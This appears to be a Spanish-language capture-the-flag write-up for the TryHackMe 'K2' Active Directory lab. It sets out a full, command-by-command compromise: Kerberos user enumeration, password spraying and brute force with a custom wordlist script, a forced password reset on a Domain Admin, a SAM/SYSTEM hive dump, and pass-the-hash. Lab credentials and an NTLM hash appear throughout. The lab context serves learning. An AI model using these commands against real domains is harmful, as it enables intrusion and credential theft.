🏔️K2 - 2/3 (AD)

Use all of the information gathered from your previous findings in order to keep making your way to the top.

Enumeración de Red

nmap

autoscan 10.10.167.138

Resultado nmap

PORT      STATE SERVICE       VERSION
53/tcp    open  domain        Simple DNS Plus
88/tcp    open  kerberos-sec  Microsoft Windows Kerberos (server time: 2025-08-12 14:41:54Z)
135/tcp   open  msrpc         Microsoft Windows RPC
139/tcp   open  netbios-ssn   Microsoft Windows netbios-ssn
389/tcp   open  ldap          Microsoft Windows Active Directory LDAP (Domain: k2.thm0., Site: Default-First-Site-Name)
445/tcp   open  microsoft-ds?
464/tcp   open  kpasswd5?
593/tcp   open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
636/tcp   open  tcpwrapped
3268/tcp  open  ldap          Microsoft Windows Active Directory LDAP (Domain: k2.thm0., Site: Default-First-Site-Name)
3269/tcp  open  tcpwrapped
3389/tcp  open  ms-wbt-server Microsoft Terminal Services
| ssl-cert: Subject: commonName=K2Server.k2.thm
| Not valid before: 2025-08-11T14:36:51
|_Not valid after:  2026-02-10T14:36:51
| rdp-ntlm-info: 
|   Target_Name: K2
|   NetBIOS_Domain_Name: K2
|   NetBIOS_Computer_Name: K2SERVER
|   DNS_Domain_Name: k2.thm
|   DNS_Computer_Name: K2Server.k2.thm
|   DNS_Tree_Name: k2.thm
|   Product_Version: 10.0.17763
|_  System_Time: 2025-08-12T14:42:43+00:00
|_ssl-date: 2025-08-12T14:43:23+00:00; +1s from scanner time.
5985/tcp  open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Not Found
|_http-server-header: Microsoft-HTTPAPI/2.0
7680/tcp  open  pando-pub?
9389/tcp  open  mc-nmf        .NET Message Framing
49669/tcp open  msrpc         Microsoft Windows RPC
49674/tcp open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
49675/tcp open  msrpc         Microsoft Windows RPC
49678/tcp open  msrpc         Microsoft Windows RPC
49682/tcp open  msrpc         Microsoft Windows RPC
49711/tcp open  msrpc         Microsoft Windows RPC
Service Info: Host: K2SERVER; OS: Windows; CPE: cpe:/o:microsoft:windows

Windows - Active Directory
Kerberos, smb, rpc, ldap
domain: k2.thm
computer: K2SERVER

Enumeración de Usuarios de Dominio

Username-Anarchy

GitHub - urbanadventurer/username-anarchy: Username tools for penetration testingGitHub

Generar variantes de usuarios recogidos anteriormente

./username-anarchy james bold > users.txt
./username-anarchy rose bud >> users.txt

Kerbrute Userenum

kerbrute userenum --dc 10.10.167.138 -d k2.thm users.txt

[+] VALID USERNAME: [email protected] [+] VALID USERNAME: [email protected]

Password Spraying

Contraseñas recogidas anteriormente

passes.txt

james:Pwd@9tLNrC3!
rose:vRMkaVgdfxhW!8
root:RdzQ7MSKt)fNaz3!

crackmapexec smb 10.10.167.138 -u users.txt -p passes.txt

[+] k2.thm\r.bud:vRMkaVgdfxhW!8

Iniciar Sesión Remota

Comprobar permisos

netexec winrm -i 10.10.167.138 -u r.bud -p 'vRMkaVgdfxhW!8'

[+] k2.thm\r.bud:vRMkaVgdfxhW!8 (Pwn3d!)

Establecer sesión remota de windows

evil-winrm -i 10.10.167.138 -u r.bud -p 'vRMkaVgdfxhW!8'

Intrusión en el Sistema

Sesión Remota Windows: k2\r.bud

Enumeración Post-Intrusión

C:\Users\r.bud\Documents

notes.txt
note_to_james.txt

La nueva contraseña de james es 'rockyou' + número + carácter especial.

net users

Usuarios locales: j.bold, r.bud, j.smith, administrator

Script pass-gen.py

#!/usr/bin/env python3
import argparse
import itertools
import string
from pathlib import Path

def parse_args():
    p = argparse.ArgumentParser(description="Genera wordlist con dígito y caracter especial en posiciones flexibles")
    p.add_argument("--base", "-b", default="rockyou", help="Contraseña base (default: rockyou)")
    p.add_argument("--specials", "-s", default=None,
                   help="Cadena con caracteres especiales a usar (por defecto string.punctuation)")
    p.add_argument("--out", "-f", default=None, help="Archivo de salida (si se omite, solo imprime por pantalla)")
    return p.parse_args()

def main():
    args = parse_args()
    base = args.base
    digits = "0123456789"
    specials = args.specials if args.specials is not None else string.punctuation

    combos = []

    # 1. Ambos al final
    for d, s in itertools.product(digits, specials):
        combos.append(base + d + s)
    for s, d in itertools.product(specials, digits):
        combos.append(base + s + d)

    # 2. Ambos al principio
    for d, s in itertools.product(digits, specials):
        combos.append(d + s + base)
    for s, d in itertools.product(specials, digits):
        combos.append(s + d + base)

    # 3. Dígito al principio, especial al final
    for d, s in itertools.product(digits, specials):
        combos.append(d + base + s)

    # 4. Especial al principio, dígito al final
    for s, d in itertools.product(specials, digits):
        combos.append(s + base + d)

    # Quitar duplicados
    seen = set()
    unique = []
    for w in combos:
        if w not in seen:
            seen.add(w)
            unique.append(w)

    # Imprimir siempre por pantalla
    for w in unique:
        print(w)
    print(f"# Total: {len(unique)}")

    # Guardar en archivo si se pidió
    if args.out:
        out_path = Path(args.out)
        with out_path.open("w", encoding="utf-8", newline="\n") as fh:
            for w in unique:
                fh.write(w + "\n")
        print(f"[+] Guardado en: {out_path}")

if __name__ == "__main__":
    main()

Generar wordlist passes.txt

python3 pass-gen.py --out passes.txt

Kerbrute Password Bruteforce

kerbrute bruteuser --dc 10.10.167.138 -d k2.thm passes.txt j.bold

[+] VALID LOGIN: [email protected]:#8rockyou

Enumeración Autenticada de Dominio

Recolección

bloodhound-python -u r.bud -p 'vRMkaVgdfxhW!8' -d k2.thm -ns 10.10.167.138 -c All --zip

Info BloodHound

[email protected] → MemberOf → IT STAFF 1 → GenericAll → [email protected] (Domain Admin)
GenericAll == ForceChangePassword

Explotación: ForceChangePassword

net rpc password "j.smith" "Pass123" -U "K2.THM"/"j.bold"%"#8rockyou" -S "10.10.167.138"

Comprobar cambio

netexec winrm K2SERVER.k2.thm -u j.smith -p 'Pass123'

[+] k2.thm\j.smith:Pass123 (Pwn3d!)

evil-winrm -i 10.10.167.138 -u j.smith -p 'Pass123'

Escalada de Privilegios

Sesión Remota Windows: k2\j.smith

Enumeración Post-Escalada

Comprobar permisos

whoami /priv

SeBackupPrivilege     |    Back up files and directories  |    Enabled
SeRestorePrivilege    |    Restore files and directories  |    Enabled

SAM/SYSTEM Backup + Pass the Hash Attack

Escalada de Privilegios: SAM/SYSTEM Backup + PtH Attack

backup sam + system

reg save hklm\system C:\Users\j.smith\temp\system.hive
reg save hklm\sam C:\Users\j.smith\temp\sam.hive

Descarga directa por evilwinrm

download system.hive
download sam.hive

Extraer hashes NTLM

impacket-secretsdump -sam sam.hive -system system.hive LOCAL

Iniciar sesión remota con admin hash

evil-winrm -i 10.10.167.138 -u administrator -H '9545b61858c043477c350ae86c37b32f'

Volcar contraseña de administrador

netexec smb K2SERVER.k2.thm -u administrator -H '9545b61858c043477c350ae86c37b32f' --dpapi

K2\Administrator:vz0q$i8b4c

Compromiso del Sistema

Sesión Windows Remota: k2\administrator

Última actualización hace 5 meses

hashtagEnumeración de Red

hashtagnmap

hashtagResultado nmap

hashtagEnumeración de Usuarios de Dominio

hashtagUsername-Anarchy

hashtagKerbrute Userenum

hashtagPassword Spraying

hashtagContraseñas recogidas anteriormente

hashtagIniciar Sesión Remota

hashtagIntrusión en el Sistema

hashtagEnumeración Post-Intrusión

hashtagC:\Users\r.bud\Documents

hashtagScript pass-gen.py

hashtagGenerar wordlist passes.txt

hashtagKerbrute Password Bruteforce

hashtagEnumeración Autenticada de Dominio

hashtagRecolección

hashtagInfo BloodHound

hashtagExplotación: ForceChangePassword

hashtagEscalada de Privilegios

hashtagEnumeración Post-Escalada

hashtagEscalada de Privilegios: SAM/SYSTEM Backup + PtH Attack

hashtagCompromiso del Sistema